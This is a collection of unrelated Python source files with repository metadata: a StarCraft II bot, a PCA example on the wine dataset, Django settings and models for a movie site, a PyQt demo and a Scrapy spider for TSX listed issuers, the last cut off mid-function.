                await self.do(stalker.attack(random.choice(self.known_enemy_units)))

    async def immortal_attack(self):
        """Send every immortal at a random visible enemy."""
        if len(self.known_enemy_units) > 0:
            for immortal in self.units(IMMORTAL):
                await self.do(immortal.attack(random.choice(self.known_enemy_units)))

    async def voidray_attack(self):
        """Mid game onwards: idle void rays prefer enemy army over structures."""
        if len(self.known_enemy_units) > 0 and self.supply_used > 100:
            fighting_units = self.known_enemy_units.not_structure
            if len(fighting_units) < 2:
                for voidray in self.units(VOIDRAY):
                    if voidray.is_idle:
                        await self.do(voidray.attack(random.choice(self.known_enemy_units)))
            else:
                for voidray in self.units(VOIDRAY):
                    if voidray.is_idle:
                        await self.do(voidray.attack(random.choice(fighting_units)))
        # if len(self.known_enemy_units) < 1:
        #     for voidray in self.units(VOIDRAY):
        #         if voidray.is_idle and self.units(NEXUS).amount > 1:
        #             await self.do(voidray.move(self.units(NEXUS).random))

    async def carrier_attack(self):
        """Mid game onwards: idle carriers prefer enemy army over structures."""
        if len(self.known_enemy_units) > 0 and self.supply_used > 100:
            fighting_units = self.known_enemy_units.not_structure
            if len(fighting_units) < 2:
                for carrier in self.units(CARRIER):
                    if carrier.is_idle:
                        await self.do(carrier.attack(random.choice(self.known_enemy_units)))
            else:
                for carrier in self.units(CARRIER):
                    if carrier.is_idle:
                        await self.do(carrier.attack(random.choice(fighting_units)))
        # if len(self.known_enemy_units) < 1:
        #     for carrier in self.units(CARRIER):
        #         if carrier.is_idle and self.units(NEXUS).amount > 1:
        #             await self.do(carrier.move(self.units(NEXUS).random))

    async def upgrade_air(self):
        """Research air weapons/armor 1-3, gated on tech buildings and supply."""
        if self.units(CYBERNETICSCORE).ready.exists and self.supply_used > 30:
            if self.can_afford(UpgradeId.PROTOSSAIRWEAPONSLEVEL1) and not self.air_weapon1_started:
                ccore = self.units(CYBERNETICSCORE).ready.first
                await self.do(ccore.research(UpgradeId.PROTOSSAIRWEAPONSLEVEL1))
                self.air_weapon1_started = True
            if self.can_afford(UpgradeId.PROTOSSAIRARMORSLEVEL1) and not self.air_armor1_started:
                ccore = self.units(CYBERNETICSCORE).ready.first
                await self.do(ccore.research(UpgradeId.PROTOSSAIRARMORSLEVEL1))
                self.air_armor1_started = True
            if self.air_armor1_started and self.air_weapon1_started:
                if not self.units(FLEETBEACON).ready.exists and not self.already_pending(FLEETBEACON):
                    pylon = self.units(PYLON).ready.random
                    await self.build(FLEETBEACON, near=pylon)
                if self.units(FLEETBEACON).ready.exists:
                    if self.supply_used > 100:
                        if self.can_afford(UpgradeId.PROTOSSAIRARMORSLEVEL2) and not self.air_armor2_started:
                            ccore = self.units(CYBERNETICSCORE).ready.first
                            await self.do(ccore.research(UpgradeId.PROTOSSAIRARMORSLEVEL2))
                            self.air_armor2_started = True
                    if self.supply_used > 100:
                        if self.can_afford(UpgradeId.PROTOSSAIRWEAPONSLEVEL2) and not self.air_weapon2_started:
                            ccore = self.units(CYBERNETICSCORE).ready.first
                            await self.do(ccore.research(UpgradeId.PROTOSSAIRWEAPONSLEVEL2))
                            # BUGFIX: was setting air_armor2_started, so this
                            # research was re-queued forever.
                            self.air_weapon2_started = True
                        if self.can_afford(UpgradeId.PROTOSSAIRARMORSLEVEL3) and not self.air_armor3_started:
                            ccore = self.units(CYBERNETICSCORE).ready.first
                            await self.do(ccore.research(UpgradeId.PROTOSSAIRARMORSLEVEL3))
                            # BUGFIX: was setting air_armor2_started.
                            self.air_armor3_started = True
                        if self.can_afford(UpgradeId.PROTOSSAIRWEAPONSLEVEL3) and not self.air_weapon3_started:
                            ccore = self.units(CYBERNETICSCORE).ready.first
                            await self.do(ccore.research(UpgradeId.PROTOSSAIRWEAPONSLEVEL3))
                            # BUGFIX: was setting air_armor2_started.
                            self.air_weapon3_started = True
if __name__ == '__main__':
run_game(maps.get("PaladinoTerminalLE"), [
Bot(Race.Protoss, Sentinel()),
Computer(Race.Zerg, Difficulty.VeryHard),
#Computer(Race.Protoss, Difficulty.Harder),
#Computer(Race.Protoss, Difficulty.Harder),
#Bot(Race.Protoss, SentdeBot())
], realtime=True) | [
"noreply@github.com"
] | 0MNIP0TENT.noreply@github.com |
d03f122f98dbf6bba0498916c870e071bb955439 | c548c10c4fd0b6c1d1c10cc645cb3b90b31f2de6 | /ml/m29_pca2_3_wine.py | b21c357d299df1dafc9268bb91762f9f1bdd2093 | [] | no_license | sswwd95/Study | caf45bc3c8c4301260aaac6608042e53e60210b6 | 3c189090c76a68fb827cf8d6807ee1a5195d2b8b | refs/heads/master | 2023-06-02T21:44:00.518810 | 2021-06-26T03:01:26 | 2021-06-26T03:01:26 | 324,061,105 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,459 | py | import numpy as np
from sklearn.datasets import load_wine
from sklearn.decomposition import PCA
# "decomposition" is sklearn's matrix-factorisation module (PCA lives there)
datasets = load_wine()
x = datasets.data
y = datasets.target
print(x.shape, y.shape) #(178, 13) (178,)
'''
pca = PCA(n_components=10)
x2 = pca.fit_transform(x) # fit과 transform 합친 것
print(x2)
print(x2.shape) #(442, 7) 컬럼의 수가 재구성
pca_EVR = pca.explained_variance_ratio_ # 변화율
print(pca_EVR) #[0.40242142 0.14923182 0.12059623 0.09554764 0.06621856 0.06027192 0.05365605]
print(sum(pca_EVR))
# 7개 : 0.9479436357350414
# 8개 : 0.9913119559917797
# 9개 : 0.9991439470098977
# 10개 : 1.0
# 몇 개가 좋은지 어떻게 알까? 모델 돌려보면 알 수 있다. 통상적으로 95% 이면 모델에서 성능 비슷하게 나온다.
'''
# Fit PCA with all components to inspect the full variance spectrum.
pca = PCA()
pca.fit(x)
cumsum = np.cumsum(pca.explained_variance_ratio_)
# cumsum accumulates the explained-variance ratios one by one: a running
# (cumulative) sum of the array elements along the given axis.
print(cumsum)
# [0.99809123 0.99982715 0.99992211 0.99997232 0.99998469 0.99999315
# 0.99999596 0.99999748 0.99999861 0.99999933 0.99999971 0.99999992
# 1. ]
# Smallest number of components whose cumulative ratio reaches 95%.
d = np.argmax(cumsum>=0.95)+1
print('cumsum >=0.95', cumsum >=0.95)
print('d : ', d)
# cumsum >=0.95 [ True True True True True True True True True True True True
# True]
# d : 1
import matplotlib.pyplot as plt
plt.plot(cumsum)
plt.grid()
plt.show()
| [
"sswwd95@gmail.com"
] | sswwd95@gmail.com |
bc4ce015eb040a0bfe60106b3a22e8e043989877 | ff182eeaf59b16f79b7d306eef72ddaadf0f4e71 | /Vaffle_interface/testcase/SystemModule/System_test23_invite_get_score.py | 877679a1cb1da86ccf973e312dd5811dcb3c9734 | [] | no_license | heyu1229/vaffle | 04d6f8b0d3bd0882ff1cdea54d18d5fdde7933b9 | 2c1c040f78094cf3cfc68f08627a958c4aa5e1d5 | refs/heads/master | 2023-06-05T09:55:21.894344 | 2021-03-12T07:26:45 | 2021-03-12T07:26:45 | 381,248,658 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 874 | py | # -*- coding:UTF-8 -*-
import unittest
import requests
import time,gc,sys
from Vaffle_interface.public_1.func_requests import FuncRequests
from Vaffle_interface.public_1.get_url import Url
class Invite_get_score(unittest.TestCase):
    """Interface test: inviting a friend awards points (expects code 10000)."""
    def setUp(self):
        # Test-account UUID and the shared request helper from project utilities.
        self.member_uuid = Url ().test_user ()
        self.requests = FuncRequests ()
    #----------------- invite earns points --------------------------------
    def testcase_001(self):
        # Spreadsheet coordinates of the interface definition used by the helper.
        sheet_index = 3
        row = 34
        print("testcase_001 反馈:")
        date=time.strftime("%Y-%m-%d %H:%M:%S",time.localtime())  # NOTE(review): unused — confirm before removing
        payload = {'member_uuid':self.member_uuid}
        result=self.requests.interface_requests_payload(self.member_uuid, sheet_index, row, payload)
        self.assertEqual(10000, result["code"])
        print("code返回值:10000")
if __name__=="__main__":
unittest.main() | [
"1004856404@qq.com"
] | 1004856404@qq.com |
0f2a3975e869ed37fbb6cd1203f10a05e51e08ff | 5276bf1bca8c3e2328b4661f8e71454f1e491ce9 | /khalifasite/asgi.py | 17f68c452b38d9b40f78cb1892823c82e9d6c65e | [] | no_license | kidaqrus/khalifa-site | e51c1a58b8dc5196e725192278e5fe4b37146369 | 2aa52aeeef2a50a8e04956b15120a037d9475c2c | refs/heads/master | 2021-01-13T22:23:23.228518 | 2020-02-28T10:34:16 | 2020-02-28T10:34:16 | 242,513,856 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 399 | py | """
ASGI config for khalifasite project.
It exposes the ASGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/asgi/
"""
import os
from django.core.asgi import get_asgi_application
# Point Django at the project settings before building the application object.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'khalifasite.settings')
# Module-level ASGI callable that servers (daphne/uvicorn) import.
application = get_asgi_application()
| [
"adikwusule@gmail.com"
] | adikwusule@gmail.com |
3658d5cfa571df350142c76baf20af84922d923e | 79eea732277857d59616a029dfc8d1e8ab721249 | /day8/exercise2.py | 15c56c81ae2014a7e5ab56010d89829c80bc62de | [] | no_license | myorg2020/python-tutorial | 0cd0757a861263a45e3d9a235b3f869ffbcad618 | 65870da260850517009e145c9fc8077fdc2de380 | refs/heads/master | 2022-11-28T02:28:57.020480 | 2020-08-09T18:06:28 | 2020-08-09T18:06:28 | 262,838,511 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 620 | py | # We have to print a dictionary in below format by taking user input:
# users = {
#     'name' : 'Amitesh',
#     'age' : 24,
#     'fav_movies' : ['coco', 'avengers'],
#     'fav_songs' : ['song1', 'song2'],
# }
users = {}
# Collect the profile fields from stdin; list fields are comma-separated.
name = input('Enter the name: ')
age = input('Enter the age: ')  # NOTE(review): kept as a string, not converted to int
fav_movies = input('Enter your fav movies separated by comma: ').split(',')
fav_songs = input('Enter your fav songs separated by comma: ').split(',')
print('\n')
# Assemble the dictionary in the documented shape.
users['name'] = name
users['age'] = age
users['fav_movies'] = fav_movies
users['fav_songs'] = fav_songs
for key, value in users.items():
print(f'{key} : {value}') | [
"amitesh1258@gmail.com"
] | amitesh1258@gmail.com |
3496f4f700e2b659641fffae4def352bfb335f83 | 6310a9bec472ff653d29dee3fa3d98bba1d57290 | /movies/models.py | 40f5dea696678775fca8bb7c40a25c79356e9779 | [] | no_license | TS2021AlenaM/DS | 9628c8d38062906ebfc1503948df45cbd56a9775 | bdef0bcfb0e41671f8db30a1589907b5add32e7f | refs/heads/main | 2023-06-18T18:54:09.954206 | 2021-07-17T16:56:17 | 2021-07-17T16:56:17 | 386,990,802 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,361 | py | from datetime import date
from django.db import models
# Create your models here.
from django.urls import reverse
class Category(models.Model):
    """Film category (top-level grouping for movies)."""
    name = models.CharField("Категория", max_length=150)
    description = models.TextField("Описание", blank=True)
    # NOTE(review): unlike Genre/Movie slugs this one is not unique=True — confirm intent.
    url = models.SlugField(max_length=160)
    def __str__(self):
        return self.name
    class Meta:
        verbose_name = "Категория"
        verbose_name_plural = "Категории"
class Actor(models.Model):
    """Actors and directors (a single table covers both roles)."""
    name = models.CharField("Имя", max_length=150)
    age = models.PositiveSmallIntegerField("Возраст", default=0)
    description = models.TextField("Описание", blank=True)
    image = models.ImageField("Изображение", upload_to="actors/")
    def __str__(self):
        return self.name
    def get_absolute_url(self):
        # Routed by name rather than a dedicated slug field.
        return reverse("actor_detail", kwargs={"slug": self.name})
    class Meta:
        verbose_name = "Актеры и режиссеры"
        verbose_name_plural = "Актеры и режиссеры"
class Genre(models.Model):
    """Film genre (many-to-many with Movie)."""
    name = models.CharField("Имя", max_length=150)
    description = models.TextField("Описание", blank=True)
    url = models.SlugField(max_length=160, unique=True)
    def __str__(self):
        return self.name
    class Meta:
        verbose_name = "Жанр"
        verbose_name_plural = "Жанры"
class Movie(models.Model):
    """Film: the central model tying together actors, genres and category."""
    title = models.CharField("Название", max_length=160)
    tagline = models.CharField("Слоган", max_length=100, default='')
    description = models.TextField("Описание")
    poster = models.ImageField("Постер", upload_to='movies/')
    year = models.PositiveSmallIntegerField("Дата выхода", default=2020)
    country = models.CharField("Страна", max_length=30)
    # Directors and actors share the Actor table; related_name keeps the
    # two reverse relations distinct.
    directors = models.ManyToManyField(Actor, verbose_name="Режиссер", related_name='film_director')
    actors = models.ManyToManyField(Actor, verbose_name="Актеры", related_name='film_actor')
    genres = models.ManyToManyField(Genre, verbose_name="Жанры")
    world_premiere = models.DateField("Премьера в мире", default=date.today)
    # Monetary fields are stored as whole US dollars (see help_text).
    budget = models.PositiveIntegerField("Бюджет", default=0, help_text="Укажите сумму в долларах")
    fees_in_usa = models.PositiveIntegerField("Сборы в США", default=0, help_text="Укажите сумму в долларах")
    fees_in_world = models.PositiveIntegerField("Сборы в мире", default=0, help_text="Укажите сумму в долларах")
    category = models.ForeignKey(Category, verbose_name="Категория", on_delete=models.SET_NULL, null=True)
    url = models.SlugField(max_length=130, unique=True)
    # Draft movies are typically hidden from public listings.
    draft = models.BooleanField("Черновик", default=False)
    def __str__(self):
        return self.title
    def get_absolute_url(self):
        return reverse("movie_detail", kwargs={"slug": self.url})
    def get_review(self):
        # Only top-level reviews; replies hang off `parent`.
        return self.reviews_set.filter(parent__isnull=True)
    def get_rating(self):
        # NOTE(review): .get() raises MultipleObjectsReturned if a movie has
        # more than one Rating row — confirm the one-rating-per-movie invariant.
        return self.rating_set.get()
    class Meta:
        verbose_name = "Фильм"
        verbose_name_plural = "Фильмы"
class MovieShots(models.Model):
    """Still frame (screenshot) belonging to a movie (original: "Кадры из фильмов")."""
    title = models.CharField("Заголовок", max_length=160)
    description = models.TextField("Описание", blank=True)
    image = models.ImageField("Изображение", upload_to='movie_shots/')
    movie = models.ForeignKey(Movie, on_delete=models.CASCADE, verbose_name="Фильм")
    def __str__(self):
        return self.title
    class Meta:
        verbose_name = "Кадр из фильмов"
        verbose_name_plural = "Кадры из фильмов"
class RatingStar(models.Model):
    """A selectable star value used by Rating (original: "Звезда рейтинга")."""
    value = models.IntegerField("Значение", default=0)
    def __str__(self):
        return str(self.value)
    class Meta:
        verbose_name = "Звезда рейтинга"
        verbose_name_plural = "Звезды рейтинга"
        # Highest star value listed first.
        ordering = ['-value']
class Rating(models.Model):
    """A single rating of a movie, keyed by client IP (original: "Рейтинг")."""
    # NOTE(review): max_length=15 fits a dotted IPv4 address only; an IPv6
    # client address would not fit -- confirm, or consider GenericIPAddressField.
    ip = models.CharField("IP адрес", max_length=15)
    star = models.ForeignKey(RatingStar, on_delete=models.CASCADE, verbose_name="Звезда")
    movie = models.ForeignKey(Movie, on_delete=models.CASCADE, verbose_name="Фильм")
    def __str__(self):
        return f"{self.star}"
    class Meta:
        verbose_name = "Рейтинг"
        verbose_name_plural = "Рейтинги"
class Reviews(models.Model):
    """Visitor review of a movie; *parent* links a reply to the review it
    answers (original docstring: "Отзывы")."""
    email = models.EmailField()
    name = models.CharField("Имя", max_length=100)
    text = models.TextField("Сообщение", max_length=5000)
    # Replies survive deletion of their parent review (SET_NULL).
    parent = models.ForeignKey('self', verbose_name="Родитель", on_delete=models.SET_NULL, blank=True, null=True)
    movie = models.ForeignKey(Movie, verbose_name="Фильм", on_delete=models.CASCADE)
    def __str__(self):
        return f"{self.name} - {self.movie}"
    class Meta:
        verbose_name = "Отзыв"
        verbose_name_plural = "Отзывы"
| [
"87577721+TS2021AlenaM@users.noreply.github.com"
] | 87577721+TS2021AlenaM@users.noreply.github.com |
3bc1379fb8d510e8890c97960043bbd3b4d5b2a4 | 041469cfe025d838bba0a40ca172d2874605d618 | /Python/environments/djangoshell/djangoshell/wsgi.py | 890c0f454fb3de6adf0c679652390b193ef1e013 | [] | no_license | anarslez/repo1 | 06816547b21504e46fa0840e9c898c3470195321 | 625befde39851d9a3bb9dfd09067f344ce68665e | refs/heads/master | 2020-03-24T19:23:52.235714 | 2018-09-11T03:59:14 | 2018-09-11T03:59:14 | 142,923,963 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 400 | py | """
WSGI config for djangoshell project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
# Fall back to this project's settings module when the environment does not
# already define DJANGO_SETTINGS_MODULE.
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "djangoshell.settings")
# Module-level WSGI callable picked up by application servers (gunicorn, uWSGI, ...).
application = get_wsgi_application()
| [
"anarslez@gmail.com"
] | anarslez@gmail.com |
cb96246148423573cb1403ea0aee9d38f67aad27 | b179e3b3fbcb971dfe9b3597098bea9c0ad1a516 | /Q3.py | 7cc36ec99e05c2bbb9229be82b2af40cc8f753e4 | [] | no_license | kautukraj/Lab2Py | f69a7143969ca2107cc869d20539620a1d38c90c | 5468306ebfc191ea784d50d20ad00cc46365c902 | refs/heads/master | 2020-07-13T04:25:00.694835 | 2019-08-31T05:50:11 | 2019-08-31T05:50:11 | 204,988,776 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 354 | py | from Q3input import *
#Your code - begin
r1 = len(m1)
c1 = len(m1[0])
r2 = len(m2)
c2 = len(m2[0])
if c1 != r2:
print ("Multiplication not possible")
output = [[0 for row in range(c2)]for col in range(r1)]
for i in range(r1):
for j in range(c2):
for k in range(c1):
output[i][j] += m1[i][k] * m2[k][j]
# Your code - end
print(output)
| [
"noreply@github.com"
] | kautukraj.noreply@github.com |
43efea586f69c18e0575129229adb4937f8816da | 215010786cd047d51f05538e3b7e1e00adcf40f5 | /GUI/lists.py | d8790dacf79d010ad4901ee03d200bfc8a82259d | [] | no_license | elugo13/Full_Stack_Programming_for_Complete_Beginners_in_Python | cc13d6aee7aefa78a3f06cedd56f7e4c066031a7 | 9dd706af89c5cfd71346f0f077af242dee229a9d | refs/heads/main | 2023-08-31T07:40:29.366909 | 2021-10-06T15:34:14 | 2021-10-06T15:34:14 | 412,499,899 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 756 | py | from PyQt5 import QtWidgets
from PyQt5.QtWidgets import *
from PyQt5.QtCore import *
from PyQt5.QtGui import *
class MainWindow(QMainWindow):
def __init__(self, *args, **kwargs):
super(MainWindow, self).__init__(*args, **kwargs)
self.setWindowTitle("Lists")
self.resize(1280, 720)
layout = QVBoxLayout()
mylist= QListWidget()
mylist.addItems(['Easy', 'Hard', 'Expert'])
mylist.currentItemChanged.connect(self.show_selected)
layout.addWidget(mylist)
widget = QWidget()
widget.setLayout(layout)
self.setCentralWidget(widget)
def show_selected(self, item):
print(item.text())
# Application bootstrap: create the Qt application, show the main window and
# enter the event loop (blocks until the window is closed).
app = QApplication([])
window = MainWindow()
window.show()
app.exec()
"lugoerik00@gmail.com"
] | lugoerik00@gmail.com |
5f1f4ad717ccde42c1a45dcfb353c5a9f6f7a916 | 3f763cf893b09a3be562858613c928703ff349e4 | /client/verta/verta/_swagger/_public/modeldb/model/ModeldbCreateProjectResponse.py | b749fb1cab032e8cfae28f8b96a3aba11500069f | [
"Apache-2.0"
] | permissive | VertaAI/modeldb | 636e46fc025b01a514d599b10e228c8735503357 | ec9ac7712500adb13fd815dfd476ce9f536c6921 | refs/heads/main | 2023-08-31T00:45:37.220628 | 2023-08-30T18:45:13 | 2023-08-30T18:45:13 | 71,305,435 | 844 | 142 | Apache-2.0 | 2023-09-14T19:24:13 | 2016-10-19T01:07:26 | Java | UTF-8 | Python | false | false | 616 | py | # THIS FILE IS AUTO-GENERATED. DO NOT EDIT
from verta._swagger.base_type import BaseType
class ModeldbCreateProjectResponse(BaseType):
def __init__(self, project=None):
required = {
"project": False,
}
self.project = project
for k, v in required.items():
if self[k] is None and v:
raise ValueError('attribute {} is required'.format(k))
@staticmethod
def from_json(d):
from .ModeldbProject import ModeldbProject
tmp = d.get('project', None)
if tmp is not None:
d['project'] = ModeldbProject.from_json(tmp)
return ModeldbCreateProjectResponse(**d)
| [
"noreply@github.com"
] | VertaAI.noreply@github.com |
d5b0a2847556b1852431142f68ab4ded685876ad | e091ca4b7c5ff05ef10f09ae0379587b0c20bf11 | /project/settings.py | 4a7e207856287089a74b996a9b3634ecd6761d5f | [] | no_license | sai-k-kiran/Attendance-management-system | f8ad8e467c9988f310c2778146ca7beec5b9953d | 0bb059b2acb62342d8bd704a294040d5ad609d70 | refs/heads/master | 2023-06-30T12:52:02.179519 | 2021-07-27T12:30:27 | 2021-07-27T12:30:27 | 389,892,078 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,468 | py | """
Django settings for project project.
Generated by 'django-admin startproject' using Django 3.2.4.
For more information on this file, see
https://docs.djangoproject.com/en/3.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.2/ref/settings/
"""
from pathlib import Path
import os
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): this key is committed to source control -- rotate it and load
# it from an environment variable before any production deployment.
SECRET_KEY = 'django-insecure-e0vgk_%#rrm(ibr24naa_*v2wup@f@^f794u7_i68#95cef32i'
# SECURITY WARNING: don't run with debug turned on in production!
# DEBUG=True exposes stack traces and settings to visitors.
DEBUG = True
# Hostnames this site may serve; must be non-empty once DEBUG is False.
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'new.apps.NewConfig',
]
AUTH_USER_MODEL = 'new.Teacher'
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'project.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'project.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.2/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [
os.path.join(BASE_DIR, 'static'),
]
STATIC_ROOT = os.path.join(BASE_DIR, 'assets')
# Default primary key field type
# https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'
| [
"sai.kiran.7698@gmail.com"
] | sai.kiran.7698@gmail.com |
f026f41d97ad800e361e469b6d9b2f9ce747b465 | 325bee18d3a8b5de183118d02c480e562f6acba8 | /pycan/pycan/spiders/listed_issuers_spider.py | 5cbf6d2e6c7d9efd5de970ad5a60ec512b0647b2 | [] | no_license | waynecanfly/spiderItem | fc07af6921493fcfc21437c464c6433d247abad3 | 1960efaad0d995e83e8cf85e58e1db029e49fa56 | refs/heads/master | 2022-11-14T16:35:42.855901 | 2019-10-25T03:43:57 | 2019-10-25T03:43:57 | 193,424,274 | 4 | 0 | null | 2022-11-04T19:16:15 | 2019-06-24T03:00:51 | Python | UTF-8 | Python | false | false | 7,315 | py | """从归档(MiG Archives)文件中提取公司列表"""
from io import BytesIO
from zipfile import BadZipFile
import scrapy
import pymysql
from scrapy import signals
from openpyxl import load_workbook
from dateutil.parser import parse as parse_datetime
from scrapy.spidermiddlewares.httperror import HttpError
from twisted.internet.error import DNSLookupError
from twisted.internet.error import TimeoutError, TCPTimedOutError
from twisted.internet.error import ConnectionRefusedError
from twisted.web._newclient import ResponseNeverReceived
from ..items import CompanyItem, ProfileDetailItem
class ListedIssuersSpider(scrapy.Spider):
    """Scrape the TSX MiG archive for the TSX/TSXV listed-issuers workbook and
    emit CompanyItem / ProfileDetailItem records for newly seen issuers."""
    name = 'listed_issuers'
    start_urls = [
        'https://www.tsx.com/listings/current-market-statistics/mig-archives'
    ]
    # Workbook column captions mapped to item field names; two known layouts.
    # Any column not listed here becomes a ProfileDetailItem instead.
    captions = [
        {
            'Exchange': 'exchange_market_code',
            'Name': 'name_en',
            'Root Ticker': 'security_code',
            'SP_Type': 'security_type',
            'Sector': 'sector_code',
            'Date of TSX Listing YYYYMMDD': 'ipo_date',
            'Place of Incorporation C=Canada U=USA F=Foreign': (
                'country_code_origin'
            )
        },
        {
            'Exchange': 'exchange_market_code',
            'Name': 'name_en',
            'Root Ticker': 'security_code',
            'Sector': 'sector_code',
            'Date of Listing': 'ipo_date'
        }
    ]
    # Place-of-incorporation letters; 'F' (foreign) has no single country code.
    countries = {
        'C': 'CAN',
        'U': 'USA',
        'F': None
    }
    @classmethod
    def from_crawler(cls, crawler, *args, **kwargs):
        """Attach the spider_opened/spider_closed signal handlers."""
        spider = super(ListedIssuersSpider, cls).from_crawler(
            crawler, *args, **kwargs
        )
        crawler.signals.connect(spider.spider_opened, signals.spider_opened)
        crawler.signals.connect(spider.spider_closed, signals.spider_closed)
        return spider
    def spider_opened(self, spider):
        """Load known Canadian-listed companies from MySQL and seed the
        auto-increment used to assign codes to newly discovered issuers."""
        self.logger.info('Opening spider %s...', spider.name)
        conn = pymysql.connect(**self.settings['DBARGS'])
        # NOTE(review): rows are accessed by column name below, so DBARGS is
        # expected to configure a dict-style cursor -- confirm.
        with conn.cursor() as cursor:
            cursor.execute("""\
select code, security_code, exchange_market_code, status from \
company where country_code_listed='CAN'\
""")
            records = cursor.fetchall()
        conn.close()
        self.companies = {}
        for it in records:
            id_ = it['exchange_market_code'], it['security_code']
            self.companies[id_] = it['code'], it['status']
        if records:
            NUMBER = slice(3, None)  # numeric suffix of a company code, after the 'CAN' prefix
            # NOTE(review): max() compares the full code strings
            # lexicographically; correct only while the numeric suffixes have
            # equal width -- confirm the code format guarantees this.
            self.max_code_num = int(max(it['code'] for it in records)[NUMBER])
        else:
            self.max_code_num = 10000
        self.total_new = 0
    def spider_closed(self, spider):
        """Log how many new issuers were discovered during the run."""
        self.logger.info(
            'Closing spider %s..., %d new', spider.name, self.total_new
        )
    def parse(self, response):
        """Locate the 'TSX/TSXV Listed Issuers' workbook link and follow it."""
        try:
            # extract()[1]: the second matched href is the workbook download.
            doc_href = response.xpath(
                "//a[text()='TSX/TSXV Listed Issuers']/..//a/@href"
            ).extract()[1]
            yield response.follow(
                doc_href,
                callback=self.parse_listed_issuers,
                errback=self.errback_scraping
            )
        except IndexError:
            self.logger.error("Can't find listed issuers info")
    def parse_listed_issuers(self, response):
        """Parse the xlsx workbook: match one of the known caption layouts,
        then emit a CompanyItem (plus ProfileDetailItems for extra columns)
        for every (exchange, ticker) pair not seen before."""
        try:
            wb = load_workbook(BytesIO(response.body), read_only=True)
            # Row 7 holds the column captions; data starts at row 8.
            labels_row, start_row = 7, 8
            for ws in wb.worksheets:
                labels = [
                    cell.value.replace('\n', ' ') for cell in ws[labels_row]
                    if isinstance(cell.value, str)
                ]
                names = [
                    it.replace(' ', '_').lower() + '_mig_can' for it in labels]
                for each in self.captions:
                    if set(each.keys()).issubset(set(labels)):
                        # Column position -> item field name for this layout.
                        indexes = {
                            labels.index(it): each[it] for it in each
                        }
                        for row in ws.iter_rows(min_row=start_row):
                            item = CompanyItem()
                            profiles = []
                            for index, cell in enumerate(row):
                                if cell.value:
                                    try:
                                        item[indexes[index]] = cell.value
                                    except KeyError:
                                        # Unmapped column -> profile detail.
                                        profiles.append(
                                            ProfileDetailItem(
                                                name=names[index],
                                                display_label=labels[index],
                                                value=cell.value,
                                                data_type='string'
                                            )
                                        )
                            try:
                                item['country_code_origin'] = self.countries[
                                    item['country_code_origin']
                                ]
                            except KeyError:
                                pass
                            company = (
                                item['exchange_market_code'],
                                item['security_code']
                            )
                            if company not in self.companies:
                                # New issuer: assign the next CANxxxxx code.
                                self.max_code_num += 1
                                item['code'] = 'CAN' + str(self.max_code_num)
                                item['name_origin'] = item['name_en']
                                if 'ipo_date' in item:
                                    item['ipo_date'] = parse_datetime(
                                        str(item['ipo_date']))
                                self.companies[company] = (item['code'], None)
                                for p_item in profiles:
                                    p_item['company_code'] = item['code']
                                    yield p_item
                                yield item
                        break
                else:
                    # for/else: no caption layout matched this worksheet.
                    self.logger.error(
                        'Failed finding captions for listed issuers')
        except BadZipFile:
            # Body was not an xlsx file, e.g. an HTML redirect page.
            self.logger.error(
                'Listed issuers may redirect to %s', response.url)
    def errback_scraping(self, failure):
        """Log request failures by twisted/scrapy failure type."""
        req_url = failure.request.url
        if failure.check(HttpError):
